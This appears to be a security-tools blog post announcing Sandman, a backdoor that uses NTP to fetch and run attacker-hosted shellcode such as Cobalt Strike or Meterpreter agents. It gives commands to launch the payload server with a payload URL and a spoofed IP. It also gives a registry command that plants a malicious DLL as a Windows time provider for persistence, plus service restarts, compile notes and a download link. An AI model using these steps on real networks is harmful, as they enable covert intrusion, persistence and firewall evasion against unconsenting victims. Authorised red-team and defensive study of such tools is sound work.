Kali Linux

Sandman : NTP Based Backdoor For Red Team Engagements In Hardened Networks

Sandman is a backdoor that is meant to work on hardened networks during red team engagements.

Sandman works as a stager and leverages NTP (a protocol to sync time & date) to get and run an arbitrary shellcode from a pre-defined server.

Since NTP is a protocol that is overlooked by many defenders resulting in wide network accessibility.

Usage

SandmanServer (Usage)

Run on windows / *nix machine:

python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
  • Network Adapter: The adapter that you want the server to listen on (for example Ethernet for Windows, eth0 for *nix).
  • Payload Url: The URL to your shellcode, it could be your agent (for example, CobaltStrike or meterpreter) or another stager.
  • IP to Spoof: If you want to spoof a legitimate IP address (for example, time.microsoft.com’s IP address).

SandmanBackdoor (Usage)

To start, you can compile the SandmanBackdoor as mentioned below, because it is a single lightweight C# executable you can execute it via ExecuteAssembly, run it as an NTP provider or just execute/inject it.

SandmanBackdoorTimeProvider (Usage)

To use it, you will need to follow simple steps:

  • Add the following registry value:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"
  • Restart the w32time service:
sc stop w32time
sc start w32time

NOTE: Make sure you are compiling with the x64 option and not any CPU option!

Capabilities

  • Getting and executing an arbitrary payload from an attacker’s controlled server.
  • Can work on hardened networks since NTP is usually allowed in FW.
  • Impersonating a legitimate NTP server via IP spoofing.

Setup

SandmanServer (Setup)

  • Python 3.9
  • The requirements are specified in the requirements file.

SandmanBackdoor (Setup)

To compile the backdoor I used Visual Studio 2022, but as mentioned in the usage section it can be compiled with both VS2022 and CSC. You can compile it either using the USE_SHELLCODE and use Orca’s shellcode or without USE_SHELLCODE to use WebClient.

SandmanBackdoorTimeProvider (Setup)

To compile the backdoor I used Visual Studio 2022, you will also need to install DllExport (via Nuget or any other way) to compile it. You can compile it either using the USE_SHELLCODE and use Orca’s shellcode or without USE_SHELLCODE to use WebClient.

Click Here To Download
R K

Leave a Comment
Share
Published by
R K
Tags: NetworksNTPRed TeamSandmanshellcode
2 years ago

Recent Posts

Starship : Revolutionizing Terminal Experiences Across Shells

Starship is a powerful, minimal, and highly customizable cross-shell prompt designed to enhance the terminal…

21 hours ago

Lemmy : A Decentralized Link Aggregator And Forum For The Fediverse

Lemmy is an innovative, open-source platform designed for link aggregation and discussion, providing a decentralized…

21 hours ago

Massive UX Improvements, Custom Disassemblers, And MSVC Support In ImHex v1.37.0

The latest release of ImHex v1.37.0 introduces a host of exciting features and improvements, enhancing…

23 hours ago

Ghauri : A Powerful SQL Injection Detection And Exploitation Tool

Ghauri is a cutting-edge, cross-platform tool designed to automate the detection and exploitation of SQL…

1 day ago

Writing Tools : Revolutionizing The Art Of Writing

Writing tools have become indispensable for individuals looking to enhance their writing efficiency, accuracy, and…

1 day ago

PatchWerk : A Tool For Cleaning NTDLL Syscall Stubs

PatchWerk is a proof-of-concept (PoC) tool designed to clean NTDLL syscall stubs by patching syscall…

2 days ago